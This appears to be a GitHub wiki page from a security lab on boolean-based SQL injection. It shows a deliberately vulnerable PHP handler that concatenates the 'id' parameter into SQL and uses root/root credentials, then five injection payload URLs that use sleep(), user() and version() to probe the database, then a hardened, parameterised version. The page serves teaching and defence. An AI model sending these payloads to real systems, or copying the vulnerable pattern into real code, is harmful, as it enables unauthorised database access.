SQL Injection 03 - yujitounai/helloworld GitHub Wiki

SQL Injection-03

Boolean-based SQL injection

Vulnerable source code (PHP)

```php
<?php
function connectDB(){
    $dbserver = "mysql:host=mysql; dbname=vuln; charset=utf8";
    $dbusername = "root";
    $dbpassword = "root";
    try {
        $GLOBALS['pdo'] = new PDO($dbserver, $dbusername, $dbpassword);
        $GLOBALS['pdo']->setAttribute(PDO::ATTR_ERRMODE,PDO::ERRMODE_EXCEPTION);
    } catch (PDOException $e) {
        $msg = $e->getMessage();
    }
}
if(isset($_GET['id'])){
    connectDB();
    // No filter is specified, so the raw string is returned unchanged
    $id = filter_input(INPUT_GET,"id");
    try {
        // Vulnerable: $id is concatenated into the SQL text, so prepare() gives no protection
        $sql = "SELECT * FROM users where id =".$id." limit 1";
        $stmt = $pdo->prepare($sql);
        $stmt->execute();
        $user = $stmt->fetch();
        // The two different responses below are the boolean oracle
        if($user['id']){
            echo "<div class=\"main\">id ". $id ." is exist</div>";
        }else{
            echo "<div class=\"main\">id ". $id ." is not exist</div>";
        }
    } catch (PDOException $e) {
        // SQL errors are swallowed; nothing is shown to the client
        $msg = $e->getMessage();
    }
}else {
    echo "usage: ?id=1";
    echo "<br>";
    highlight_file(__FILE__);
}
?>
```

Attack method

/users/user.php?id=2-sleep(1)

/users/user.php?id=20-length(user())

/users/user.php?id=7-if(version()%20like%20concat(0x3825),1,0)

/users/user.php?id=7-if(version()%20like%20concat(0x382e302e3330),1,0)

/users/user.php?id=7-if(version()=concat(0x382e302e3330),1,0)
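
A hardened form of the handler above, added here as an example (not code from the wiki): `id` is validated as an integer and bound as a parameter, so each request listed above is rejected with a 400 before any SQL is built. Connection settings are copied from the vulnerable sample; the response messages and status codes are assumptions.

```php
<?php
// Added example: hardened version of the vulnerable handler (not the wiki author's code).
function connectDB(): PDO {
    // Same host, database and credentials as the vulnerable sample on this page
    $pdo = new PDO("mysql:host=mysql;dbname=vuln;charset=utf8", "root", "root");
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // Use server-side prepared statements instead of client-side emulation
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    return $pdo;
}

// FILTER_VALIDATE_INT yields null when the parameter is absent and
// false when it is not a plain integer (e.g. "2-sleep(1)")
$id = filter_input(INPUT_GET, "id", FILTER_VALIDATE_INT);
if ($id === null) {
    echo "usage: ?id=1";
    exit;
}
if ($id === false) {
    http_response_code(400);
    echo "id must be an integer";
    exit;
}

try {
    $pdo = connectDB();
    // The SQL text is constant; the value travels separately as a typed parameter
    $stmt = $pdo->prepare("SELECT id FROM users WHERE id = :id LIMIT 1");
    $stmt->bindValue(":id", $id, PDO::PARAM_INT);
    $stmt->execute();
    $user = $stmt->fetch(PDO::FETCH_ASSOC);

    // Escape before echoing, even though $id is already an int at this point
    $shown = htmlspecialchars((string)$id, ENT_QUOTES, "UTF-8");
    if ($user !== false) {
        echo "<div class=\"main\">id {$shown} exists</div>";
    } else {
        echo "<div class=\"main\">id {$shown} does not exist</div>";
    }
} catch (PDOException $e) {
    // Log server-side; return a generic error to the client
    error_log($e->getMessage());
    http_response_code(500);
    echo "internal error";
}
```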
